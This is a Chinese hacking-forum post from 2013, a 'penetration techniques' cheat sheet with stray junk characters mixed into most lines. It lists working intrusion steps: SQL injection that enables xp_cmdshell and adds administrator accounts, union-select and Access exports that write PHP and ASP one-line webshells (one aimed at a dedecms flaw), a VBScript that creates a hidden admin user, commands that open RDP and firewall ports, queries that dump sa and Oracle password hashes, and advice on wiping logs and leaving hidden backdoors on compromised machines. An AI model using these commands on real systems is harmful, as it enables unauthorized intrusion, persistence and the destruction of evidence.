找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4934|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

8 z3 X/ \4 o) T3 _. I; a1.net user administrator /passwordreq:no
; c& g3 k* Y9 @: S# F这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
0 B4 G0 T3 c: o: N# v' I. `2.比较巧妙的建克隆号的步骤& ~$ \( I  Q. l0 Y
先建一个user的用户
5 ~9 E# H( b! k( _, l% w7 u然后导出注册表。然后在计算机管理里删掉
# y# p8 c) M& S5 p, ]" l# J7 P: C在导入,在添加为管理员组
3 }9 I2 j5 B2 L, x3.查radmin密码
  i" _4 T; c& }/ F/ Ureg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
! @# U- {# b8 T7 r4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
4 _- N4 m6 K* T* G" n建立一个"services.exe"的项+ B5 o& P6 \8 R
再在其下面建立(字符串值)
0 m8 W- k% K+ d2 e5 ]键值为mu ma的全路径3 k) ]) ~0 O7 M7 h* p: O; a
5.runas /user:guest cmd
1 V  ~/ g8 ]3 W3 E# `( r6 C- }测试用户权限!
, E4 Q2 [3 ^* C" ~! ?& x+ G6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
/ v+ D; ~0 K% K+ \/ N1 M$ N7.入侵后漏洞修补、痕迹清理,后门置放:- ^  r" T* |0 q6 L$ G! _
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门4 ]9 C% |, _$ S: O6 Z; l
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
. H- U5 |/ z  h0 P. G' M- L$ ^" Q% r0 U! e3 V/ X+ y
for example
7 C2 C, b, h3 M5 p$ w3 @6 d7 I8 Y. b. m% E+ P6 Q. \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add', H' r4 {, |, ~9 W+ j, k! M6 R
3 L9 e) _) b/ Z( H! M( T5 J, \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
) |6 L# Q  @4 Q2 D0 s, b8 u1 S' J3 M3 a5 d! E( a
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了, h& J/ a3 v! D  t
如果要启用的话就必须把他加到高级用户模式
1 b2 m# o; v: w2 e可以直接在注入点那里直接注入
/ D/ M6 e5 k& f' e% Mid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
% Y' S  b# D  z' w3 V) J然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
; |# n$ S, R# _' k* A5 w或者
( m) j' T9 z/ t+ Nsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'! z1 t9 a' c+ R2 b6 p
来恢复cmdshell。
$ l' d8 \, W* m9 l$ N4 j
- M4 q( L' c& O  I1 r- a1 v分析器
! d, B! M# f& V' k  ?) XEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--' |5 j# _. g; l5 R8 [3 \6 i
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")+ ]' G# ?: ^& c! B' q# I: e
10.xp_cmdshell新的恢复办法' Z+ T( \3 n2 k% `- o
xp_cmdshell新的恢复办法/ a+ h/ ~6 H5 D' \
扩展储存过程被删除以后可以有很简单的办法恢复:: R/ q6 }' ~& L! s! U, Q
删除
( c8 a) N5 x$ t" xdrop procedure sp_addextendedproc
! t3 X4 A& S, Cdrop procedure sp_oacreate/ B( g9 p: y( O6 B$ g" [  _
exec sp_dropextendedproc 'xp_cmdshell'
2 l* l" D4 _9 o, l, S
# L5 p; N6 k7 z+ y% z恢复
+ S; L; R+ w5 E& W8 V- Xdbcc addextendedproc ("sp_oacreate","odsole70.dll"); l" r% X- ?5 Q% D. }) E
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")# `) h( U5 r. U

! R: E  ~3 ?! `- f: U" z这样可以直接恢复,不用去管sp_addextendedproc是不是存在5 g' J# K3 z5 ^" W# f
  l" O. ~- E$ D& v( {$ v
-----------------------------+ y" H  g- T9 X7 U. ?* V
7 S" Z% A' h1 o! M% W2 ^
删除扩展存储过过程xp_cmdshell的语句:
; y+ Z. R* t8 Iexec sp_dropextendedproc 'xp_cmdshell'
* [# w- @/ ?) x" L) Y" G0 ?5 v8 e$ h% F0 ?$ E  [7 s
恢复cmdshell的sql语句
, q( x0 S$ T0 T- S8 f3 v: x, v% ]exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
$ `) L+ j# V  c. v, k5 P$ c! `2 a0 |0 l
" C% v) Z9 |2 s2 m  q4 @2 m% {
开启cmdshell的sql语句
/ R7 m& f: d) R3 }1 i/ `
5 j" Y) M, @; r7 Q, A5 B! Rexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
# P* y! G% B& P# y* ?9 u
5 L) S7 B' ]! A判断存储扩展是否存在# S3 L0 U! V# N6 r# z
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'3 [( H3 x' K9 \9 ?
返回结果为1就ok
0 \5 c$ ~2 c" j, _
# E  C: c" h5 m: I  s恢复xp_cmdshell
; `' ~4 F# J1 ^: L6 x& b2 Lexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
, u6 {* [% Z; q# O返回结果为1就ok0 j8 o! I" V% |$ N
# {& a# d" l2 v1 G- L7 _
否则上传xplog7.0.dll
- E( z; f. L- o% ^, _- Wexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
# ~- u( r. N. X* U. R2 w- e2 T+ u
堵上cmdshell的sql语句
4 j6 V( n6 j, C! D* `sp_dropextendedproc "xp_cmdshel
0 @9 l% V* w  {( z-------------------------
+ M. `+ N) _: z7 g& T2 J清除3389的登录记录用一条系统自带的命令:: u+ w1 I& I! I1 Y2 `2 \
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
2 |  L: y* D6 l
% p& w$ {1 J1 \" R' A然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
, t2 g% Q; g9 u2 n7 w在 mysql里查看当前用户的权限
$ H+ T, \3 `0 }& s0 ushow grants for  2 \% n) e3 S9 I2 R) N/ k- e

" g6 C. n: D0 l/ o以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。3 @5 c& w4 R: p' C

* Q8 r4 ^  z/ Q  Q  ^, v* R. I4 k  ^7 J( ^
Create USER 'itpro'@'%' IDENTIFIED BY '123';/ X' F& t- R  h" E" a% k  N. U' G0 V
7 H7 d# L1 T# r
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
  u' L+ V# [6 y! n8 u* c1 s
* n% c2 U4 G- N$ u* h$ yMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
" I* @, f6 s! n( w  S* d/ L5 I4 @$ H! x& B* j
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;# S- v9 ~9 Y1 A( j

# w/ j- q3 ~- W& E7 O搞完事记得删除脚印哟。0 ?' [/ e+ `) d: x6 c1 D
+ S  a0 l9 o2 l0 B( S
Drop USER 'itpro'@'%';* P- U9 }' l' E, X- U: m0 X% B4 W

2 Q& u4 ?. u0 M  o, GDrop DATABASE IF EXISTS `itpro` ;
4 u( x1 x5 B/ }0 M( a' I# R9 f" Y- H$ W! b9 k, P' R( `# K( H& G5 Q1 `
当前用户获取system权限
& n, h; B6 m. y1 X9 g* z. [% Asc Create SuperCMD binPath= "cmd /K start" type= own type= interact) r# U5 A' B' p$ h
sc start SuperCMD
4 Q; K* i$ o; y& [) G8 P# ~1 V程序代码5 e0 @# E& D9 R; ~
<SCRIPT LANGUAGE="VBScript">
9 X/ r' \3 k+ [$ |# r  Tset wsnetwork=CreateObject("WSCRIPT.NETWORK")* {9 Z! y+ K, X2 M: N3 \
os="WinNT://"&wsnetwork.ComputerName
  b$ w- J4 @6 C: p: V' xSet ob=GetObject(os)
7 `9 N- a: z/ u  _Set oe=GetObject(os&"/Administrators,group")' K5 M% W2 }+ q* v9 p* q! \
Set od=ob.Create("user","nosec")
0 I1 u; M# C/ _3 E: uod.SetPassword "123456abc!@#"5 J, w# n# g2 m
od.SetInfo0 W9 W& }! @0 q& y; }% b0 X
Set of=GetObject(os&"/nosec",user)2 e4 K5 i4 y) ^2 i8 n2 C) S" j
oe.add os&"/nosec"
$ M0 ]2 \6 Z8 k: w: H6 F</Script>
& L: j. i* y6 s7 O# }1 R& z( }<script language=javascript>window.close();</script>
; f1 P9 L0 S6 z1 U% ~1 c/ ~4 ~, o  D8 N! W+ R

$ A, S9 H+ v3 _# S; r" ~! g3 f, d' }, `$ c5 X2 v( w4 G9 x. O
7 m+ _+ L$ Q/ i8 x. M; D% k
突破验证码限制入后台拿shell
5 N, {$ U- M. }2 j程序代码7 T7 R4 V+ j% m
REGEDIT4
6 n5 s/ A8 F% G/ p  E% {[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] - `0 s9 Y3 R+ T/ F4 w+ f
"BlockXBM"=dword:00000000
. I8 e9 G5 s. M' a8 `; O
% |  e# X, R& B6 ]4 ~3 Q9 P保存为code.reg,导入注册表,重器IE
8 V% S' C& e! p+ P( y就可以了
+ L2 H. C$ t; Punion写马0 u% K1 G/ l  D" e
程序代码
& o  S; _& w% y" J& r. d" Ewww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
0 K7 `- z  U. ^# L, Q4 G, A3 D% ?' q
应用在dedecms注射漏洞上,无后台写马
# {8 T! x; u& I& n5 s# H( L4 X# jdedecms后台,无文件管理器,没有outfile权限的时候
, E. y2 r. b) @5 C( N8 u4 b+ t$ L在插件管理-病毒扫描里+ E$ L+ h9 m7 n
写一句话进include/config_hand.php里! x  o1 I# P1 w
程序代码4 [9 l" U6 B- V2 A
>';?><?php @eval($_POST[cmd]);?>& T1 W" x% `0 B# d- J  V

7 T+ Q% I- Q) d' f5 v; q% r9 ~/ V. L4 N" u  r
如上格式
7 S/ _4 ^% ^! n/ c; o& f' d2 D2 d# S% I' f
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解3 I# s* }6 [9 E7 m% W' T
程序代码
% a4 u! j& D$ Y" T$ {0 j6 Hselect username,password from dba_users;/ I1 M) T  u/ q2 @8 N
, p/ O' _3 k: G

7 {; U4 L( C8 }+ bmysql远程连接用户; X! I  H/ v" U  J
程序代码! i6 Y0 L8 Z7 Q; g

+ `" F3 i" _" D( V3 TCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
0 C/ k6 [: I3 O) G6 NGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
3 I( ]% g2 y$ Y: z, nMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0/ L; V7 ]3 D3 t+ V$ s9 D
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;, C* c' @* n/ ~

9 c+ {" W8 p+ c% j( K. q4 b: u2 V$ j
1 P: L& w5 ]' n
* s# e7 {( I$ Z3 ^3 [
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
4 _; A" I8 t( y/ Y& u  L8 l  Z! S  Q6 K& i
1.查询终端端口
" r5 ~9 A8 E7 h) \* B- }6 \6 Y3 n  J7 P  T# Z2 Q! l0 N
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
' x5 }) l6 _" E1 ]2 ^: Z" J1 u* J& \! ]4 X1 B
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"3 C3 H- N4 A& O8 ^3 e
type tsp.reg+ \+ }8 t  J6 f+ D/ K4 Y) K
* _2 D. H; _/ B" j+ Q5 V/ E0 [
2.开启XP&2003终端服务$ o2 ]8 O- O, Z

1 l; S. T! j4 h0 _# @: W5 `
) K* C( c# ?; U6 WREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
: M3 f! o+ }' T$ a7 {) g$ ~& Z, P$ g5 B, e8 V$ I/ h3 f

/ m. E+ U7 C8 H  D5 j, iREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f8 X% q* Y2 B. K

6 e. _; B: @7 @# ~6 o# x3 @& A' V3.更改终端端口为20008(0x4E28)' t! Q4 R4 T. y8 v6 ^

, T& }. c& V  f9 H8 S# UREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f1 b6 j+ ]' M8 u& I8 L+ K+ R% Z5 h

& t$ v4 R7 v" E7 zREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; W' p; r7 w# @1 u4 u4 y. m2 w+ z8 A4 Y8 z) G7 r+ @
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
8 t# P( r- S/ \9 W9 i# c  C: l6 g
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f# [3 Z8 G; u3 H
( |/ p5 r6 Y# k) I. S& D7 t0 `

7 p. k$ L" y( l) o: m8 i1 n5.开启Win2000的终端,端口为3389(需重启)
4 w) _. P3 Z# H
8 v+ @2 X# P7 J5 kecho Windows Registry Editor Version 5.00 >2000.reg & X* k$ P9 Q! T: j0 [( H# @
echo. >>2000.reg
! [1 c! f% F2 M2 H. o3 jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
$ `* C9 H, Y5 O4 e( r, iecho "Enabled"="0" >>2000.reg ; I! j# G& l9 j" d, E
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
1 H0 o2 C8 w3 |. j5 G( kecho "ShutdownWithoutLogon"="0" >>2000.reg
- H: s$ v" S: x. D! eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg - u) o! I& S6 d. _% P
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
- f! ^, w/ l  q. X6 ]1 n/ cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg * `0 B& z; N" D& V  }
echo "TSEnabled"=dword:00000001 >>2000.reg ! a- U0 _) ?# k0 i3 C4 g  I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg : X. m8 ~. a6 v4 m) E6 G% k" w
echo "Start"=dword:00000002 >>2000.reg
7 i! d. E7 E$ @7 `' B" |. S: cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
) M1 N0 H, C' q/ }. U3 k& E: Yecho "Start"=dword:00000002 >>2000.reg
. w5 {! q2 L7 r1 `echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg # m. J# M' o5 {/ n$ _
echo "Hotkey"="1" >>2000.reg
3 J5 y  l  M5 S& j0 o7 }# Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
$ m2 E  Q8 I; q% t$ Oecho "ortNumber"=dword:00000D3D >>2000.reg
* \2 W, `0 w$ V! p8 pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
; h- Q! D$ T/ }  decho "ortNumber"=dword:00000D3D >>2000.reg, b7 x# |5 H" h
  X- f+ q3 m. C
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
3 @" y+ F+ n: m. F- b" I. a
" F! T& J$ w5 V8 d1 F. {) n- R@ECHO OFF & cd/d %temp% & echo [version] > restart.inf; d; N% [0 U: q1 L) ^8 a
(set inf=InstallHinfSection DefaultInstall)* l, X' u, t, D; y. r
echo signature=$chicago$ >> restart.inf
3 f1 V2 z) ~/ U/ {8 c7 ]/ Secho [defaultinstall] >> restart.inf
* a7 ^" w% R' l, ?: A* I4 W  Orundll32 setupapi,%inf% 1 %temp%\restart.inf& J! p% b' m0 P: \
. H# ~; w7 e5 |) D

0 T% @& c6 Q$ a7.禁用TCP/IP端口筛选 (需重启)
; O' v0 a9 N3 x, T5 \$ w$ }5 m
  d+ _0 b4 N2 x5 O" o0 QREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
! N1 S$ y* i/ u' v2 _, Z) @6 ^4 H1 v1 w6 m8 O, \
8.终端超出最大连接数时可用下面的命令来连接' C1 u0 F8 v' e- ?8 \$ w: i: S8 F

0 {) E( s" D" e) u7 Vmstsc /v:ip:3389 /console9 G* Z# X7 y5 S! ~  b
' U+ u1 X$ B& A& ?
9.调整NTFS分区权限
( |( F$ q  G0 u8 {/ Y8 ]; j* u7 Z2 j8 P/ r$ @! {4 r5 {/ z  ?
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
) q8 q# c5 a" g1 Z7 L. a8 S% ?) q! t; g# o& f
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
. F3 k, m# M$ e; K6 R. y, M- d& c
------------------------------------------------------! Q* k" G. m0 A0 [
3389.vbs
2 j3 S- D( Q! b5 c1 e+ gOn Error Resume Next
2 I& f8 _( }- e$ O) pconst HKEY_LOCAL_MACHINE = &H80000002
/ s: O4 n/ Q, i: ?9 X4 v" E7 FstrComputer = "."
$ a  X; ?' ^/ B* S- ?' s& }$ xSet StdOut = WScript.StdOut
( g- r/ x0 m) [4 U5 G/ r( VSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_; A1 Y$ T5 a4 D7 |4 r, q1 v$ J6 e
strComputer & "\root\default:StdRegProv")! U7 _2 v: @" M, J* H& h% y3 y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
/ [, M: I# n" l. v' s: `+ Koreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
( Z. p7 Q% M; u6 lstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp", T+ B& |- n) x% G! f
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
0 d$ V% x$ t# y& g: pstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp") `$ ^1 D2 y9 g# l! y# B0 y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"  H/ }+ [) R% k3 v( V9 C
strValueName = "fDenyTSConnections"
6 n0 \$ V; F+ ^dwValue = 0
# h' n. F1 j0 m# Z' S- @( I& t6 _0 D) Uoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
3 d6 u8 E, b/ A7 Q9 K9 IstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
: M( q. ~' ?! n4 d- l, F! fstrValueName = "ortNumber"/ k% E. e: C8 J" ?
dwValue = 3389
3 P8 U# s  C' e6 H" e7 g4 Loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue, \8 R; d* @; j$ M; N
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
1 z( D5 B7 F4 j# I& c0 `# i( bstrValueName = "ortNumber"
4 [& e5 L8 s  K# M/ udwValue = 3389& [* y' k" L! _5 S6 R+ I
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
- o  z: g3 [. L* X. mSet R = CreateObject("WScript.Shell")
  Q1 q* x$ @5 q, L8 mR.run("Shutdown.exe -f -r -t 0")
- I  _. J/ A$ h7 a1 b
* @  e! m1 g& B# L- j删除awgina.dll的注册表键值! N" k6 f% x5 U/ _" y
程序代码6 a5 P. k. c6 `4 l) }* z
9 s% w2 J+ a, P. ?) o5 g
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f! k# P" J. e8 h2 `" a' p3 _
9 d. m; D! p( F3 w5 e! S, I
7 P6 Y" P, U4 e( a$ s4 ^

9 X+ z: p& ^' K: `& E# {& O1 Z0 i6 w2 b' G' Y6 T7 k6 g, p( B
程序代码
/ I2 j/ C, Q/ E: pHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash0 ^: C; m! x' t  w6 p4 W/ Y, Y
  g' R; L/ t7 X& `8 L0 C
设置为1,关闭LM Hash
) U: j  O: ]6 Q( L6 q
$ k" `- q' B- B  I8 h) V6 u' n5 G8 y数据库安全:入侵Oracle数据库常用操作命令
( p1 j5 V  Z# f7 J) T$ B最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。# i  i; _9 c8 _. Z
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。' M; F- C1 s0 p9 F' L+ Q- l% s$ {
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;, s8 T( @' y. @$ N4 u) e5 B) q
3、SQL>connect / as sysdba ;(as sysoper)或- x" I1 ~& o9 j& F# B
connect internal/oracle AS SYSDBA ;(scott/tiger)
; L1 b% r  W. i& P9 h9 m: z- @, ?0 @conn sys/change_on_install as sysdba;* v7 ^4 L1 w+ i2 Y
4、SQL>startup; 启动数据库实例7 w; f6 O4 L6 Y0 C" L6 s8 R/ \
5、查看当前的所有数据库: select * from v$database;# A. I6 w1 J; A& ^( e5 L
select name from v$database;0 c% m: ?% W( z5 J, i# `" U
6、desc v$databases; 查看数据库结构字段5 x8 `/ V6 Z6 B
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
1 i+ G0 v/ T8 @# l/ ]3 x0 b( L4 cSQL>select * from V_$PWFILE_USERS;6 C1 A* S& K1 h" Y
Show user;查看当前数据库连接用户+ W1 ~2 g- h. o4 N' a, P
8、进入test数据库:database test;3 x/ j+ ~7 W8 }5 u9 E/ f$ }
9、查看所有的数据库实例:select * from v$instance;2 P- P! G. A& F7 O
如:ora9i
5 }* D0 P8 b; u) x/ v6 O10、查看当前库的所有数据表:
8 U; t# S- n8 _& l( Q3 Y+ \9 pSQL> select TABLE_NAME from all_tables;
: a" P) w7 N2 C5 U& G$ `select * from all_tables;
( i3 n8 g% V1 h/ P" oSQL> select table_name from all_tables where table_name like '%u%';
6 y- |# y/ x4 Y" P9 g+ h# ]5 g* J) ]TABLE_NAME
1 \. u# q% k5 ]3 d# y5 o------------------------------% w, G& D$ j# S
_default_auditing_options_9 c$ T- S, X1 Y& l
11、查看表结构:desc all_tables;, U$ m3 [  Q$ g5 A1 ~) M4 A
12、显示CQI.T_BBS_XUSER的所有字段结构:) u5 Y7 _- J  T2 c3 d) ]% B
desc CQI.T_BBS_XUSER;2 o( t5 D* W- k* ?; D
13、获得CQI.T_BBS_XUSER表中的记录:" O5 |, ^% P. _- K. N. c" g; s
select * from CQI.T_BBS_XUSER;
) Y% P& t' D" f+ z14、增加数据库用户:(test11/test)# c% X+ G! z) E: ]5 p2 j7 }
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
- j7 U# z7 |/ f0 ~( A6 h4 k15、用户授权:& `! t+ G$ T$ M( h$ _5 \
grant connect,resource,dba to test11;
( _  H; j+ C0 r8 o: ^/ m1 t4 Z! Qgrant sysdba to test11;
& n8 R' o4 L, H& R. vcommit;
* T. M* n& I" ~3 l% W16、更改数据库用户的密码:(将sys与system的密码改为test.)& V* D3 w0 X3 U% ?) i
alter user sys indentified by test;
: x$ n6 d2 @+ R! i5 o0 e9 Talter user system indentified by test;( R6 T# S4 |0 c/ }6 l" f, n

. F. ^9 p& O& z7 w. e7 SapplicationContext-util.xml
- o8 |! b9 P9 u" c1 eapplicationContext.xml8 G$ P, j" v& m2 P# c9 q
struts-config.xml% r2 C4 k; v" \# s. O
web.xml
& k# g3 `/ e) W9 A8 v8 U. yserver.xml
2 V% ^' H9 O" s0 _* G- `3 v! t8 T! ^tomcat-users.xml5 t. u% h8 s3 P" {3 s
hibernate.cfg.xml" r+ ?  T0 S* c( l$ P
database_pool_config.xml' m+ X& D+ a% x# ]

7 C* ~9 W$ n- d4 f5 r+ e
& D* W) Y# N! s) \\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
% A/ i2 w! o, Z2 d( }; W\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini2 D* R  T  M7 R- j
\WEB-INF\struts-config.xml  文件目录结构
$ q( u5 _* s( v( t  E6 L4 r
& s- y+ c9 `* V( s7 \spring.properties 里边包含hibernate.cfg.xml的名称
8 B  r. ~7 n: ~, Q7 }  n4 S$ |# z  `; C5 c/ _

$ \' j5 t( O4 t# G+ h  C2 s4 L+ LC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml: q$ D/ a3 z+ v) R
6 J% n$ I0 K  A' N2 Z* T/ P
如果都找不到  那就看看class文件吧。。
+ ^6 _; D0 S% _7 F7 R
0 i$ Y6 G5 G/ N5 Z测试1:
' [$ q: e; Y  ^( t/ p. uSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1: S) _5 q3 y# X
: \4 l8 c) m- b4 T
测试2:! C3 x, O' J: _  [

; g+ }0 S; M2 {2 @3 S7 y1 Kcreate table dirs(paths varchar(100),paths1 varchar(100), id int)( M9 e) ^* F5 v, C
' c5 Z; `" L1 v
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
* V* z( D% S1 G8 Z+ k7 ~' U
; a# L# r& `7 o5 }  ^SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
6 e- \) f* y4 y) l. O) K9 K
, f% }( O7 D/ [: x, F查看虚拟机中的共享文件:
1 l6 Q3 R! J' E; `2 v在虚拟机中的cmd中执行* t7 q' e. {- }% d. o
\\.host\Shared Folders, r; \% E& P& u* a: V( @
: i9 A: p6 b$ A, z5 o7 e
cmdshell下找终端的技巧
! a% F8 i" w, M- O6 T8 p+ Q0 m$ I找终端: % H; x) Q: _! u& _5 F8 h
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! - i/ y. ^$ }9 n' r! m
   而终端所对应的服务名为:TermService $ {! \/ X: o2 C$ [7 v2 m" S, K" p/ H
第二步:用netstat -ano命令,列出所有端口对应的PID值! & {. Z2 V0 y& {  _! \$ @: u7 I
   找到PID值所对应的端口) I4 S$ L, U. I! u5 q* L
; {1 w! \# D4 v% a
查询sql server 2005中的密码hash4 [, E; V" w* a
SELECT password_hash FROM sys.sql_logins where name='sa'9 h& v/ F1 l* F* |) Z
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
$ S; N4 _, a" B+ B, }. ?1 naccess中导出shell
